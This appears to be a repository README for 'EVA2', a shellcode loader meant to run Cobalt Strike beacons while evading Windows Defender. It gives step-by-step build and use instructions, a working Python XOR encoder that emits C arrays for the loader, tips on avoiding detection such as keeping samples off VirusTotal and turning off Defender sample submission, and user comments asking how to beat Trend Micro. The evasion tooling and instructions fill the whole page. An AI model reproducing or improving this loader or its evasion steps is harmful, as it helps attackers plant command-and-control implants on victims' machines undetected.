EVA2

Another version of EVA using anti-debugging techniques and direct syscalls

First thing: don't upload this to VirusTotal. This note is for you, not for me. If you want to keep this code effective and use it to bypass Windows Defender, DON'T UPLOAD IT TO VIRUSTOTAL OR ANY SIMILAR WEBSITE (every upload hands the sample to AV vendors); otherwise read the note at line 11 in EVA1.


REQUIREMENTS:

  • Visual Studio 2019 [it may also work with Visual Studio 2017]
  • Cobalt Strike [take a look at my cobalt-wipe repo]
  • Python 2 for the encoder

USAGE:

  • Load the profile googledrive_getonly.profile in Cobalt Strike: ./teamserver <lhost> <pass> <path to googledrive_getonly.profile>
  • Generate your shellcode in Cobalt Strike using an HTTPS listener, x64 only (x86 won't work) [check my cobalt-wipe repo]
  • Place your shellcode inside encoder.py (preferably change the keys) and run it with Python 2
  • Copy the encrypted shellcode that encoder.py outputs and paste it into EVA.cpp
  • If you want to inject into another process, uncomment line 45 (not recommended)
  • Build the code with Visual Studio 2019, Release, x64 (x86 won't work)
  • Enjoy

Features:

  • New Malleable C2 profile for the Cobalt Strike C&C connection (the profile is from here)
  • Anti-debugging techniques
  • Encoded shellcode
  • Decryption and injection of the shellcode happen in memory, byte by byte, so the decrypted payload is never produced as one bulk write and there is less chance of being detected (note that once the loop finishes the whole decrypted shellcode is still resident, so an in-memory scan of the region can still catch it)
  • Direct syscalls (these avoid user-mode hooks on ntdll, but direct syscalls from user mode can themselves be detected, for example through instrumentation callbacks)
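How the encoder step in USAGE and the byte-by-byte decryption in the feature list fit together, as an added example that is not the repository's encoder.py or EVA.cpp (the page shows neither their algorithm nor their keys). It assumes a repeating-key XOR, a constructed stand-in payload instead of real beacon shellcode, and Python 3 rather than the Python 2 the project requires; the array names key and enc and the function names are placeholders.

```python
import os

# Constructed stand-in for the shellcode you would paste into encoder.py.
# These are just a few arbitrary bytes, NOT a Cobalt Strike beacon.
SAMPLE_SHELLCODE = bytes([0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
                          0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51])


def xor_encode(data, key):
    """Repeating-key XOR (assumed scheme). Symmetric: applying it again with
    the same key recovers the original bytes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_c_array(name, data, per_line=12):
    """Emit an unsigned char array literal for pasting into a C/C++ source."""
    lines = []
    for off in range(0, len(data), per_line):
        chunk = data[off:off + per_line]
        lines.append("    " + ", ".join("0x%02x" % b for b in chunk) + ",")
    body = "\n".join(lines)
    return "unsigned char %s[%d] = {\n%s\n};" % (name, len(data), body)


def decode_in_place(buf, key):
    """Decode one byte at a time into the buffer that will be executed,
    mirroring the loader's byte-by-byte approach: no separate plaintext
    copy is ever built, but the whole buffer is plaintext once the loop ends."""
    for i in range(len(buf)):
        buf[i] ^= key[i % len(key)]


def encode_for_loader(shellcode, key=None):
    """Pick a fresh key (the README says to change the keys), encode the
    payload, and return (key, encoded, C source to paste into the loader)."""
    key = key or os.urandom(16)
    enc = xor_encode(shellcode, key)
    c_src = to_c_array("key", key) + "\n" + to_c_array("enc", enc)
    return key, enc, c_src


if __name__ == "__main__":
    k, e, src = encode_for_loader(SAMPLE_SHELLCODE)
    print(src)
    # Sanity check the round trip before pasting anything into EVA.cpp.
    buf = bytearray(e)
    decode_in_place(buf, k)
    assert bytes(buf) == SAMPLE_SHELLCODE
```

Run it once, paste the printed arrays into the loader, and keep the key out of any repository you publish: with a repeating-key XOR the key is trivially recoverable from the encoded bytes if the plaintext prefix is known, so the encoding only buys you protection from static signatures, not from analysis.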

DEMO:

[+] You can do yourself a favour and disable Automatic Sample Submission in Windows Defender on your test machine, so Defender does not ship your sample to Microsoft:

(screenshot: Screenshot 2021-06-25 123639)

Demo video: EVA2.-.DEMO.mp4

Special thanks to:


LICENSE: GNU General Public License v3.0


My empty Ethereum wallet (no jokes): 0x1B4944030818392D76672f583884F4A125A4415e



Comments
  • Code issues

    I tried compiling achlys and running it but was unable to get it working; also the exe file had some errors compiling, but I was still able to generate the exe file in VC 2019.

    opened by sly9it
  • Trend Micro Antivirus breaks the app

    Firstly, thank you for a great tool, I wish you success and all the best.

    Feedback

    So I compiled everything successfully. It all works if I disable antivirus; I can run it and I get the initial beacon on Cobalt Strike.

    Issue

    I have Trend Micro installed. When I enable it, it crashes after saying: "Running the Thread". I tried changing the encryption keys, same issue. I tried renaming the exe to another name, same issue. I tried signing the exe and adding an icon to it too, still the issue persists.

    Any advice on how to overcome this?

    (screenshot: Issue1)

    opened by honeyfairy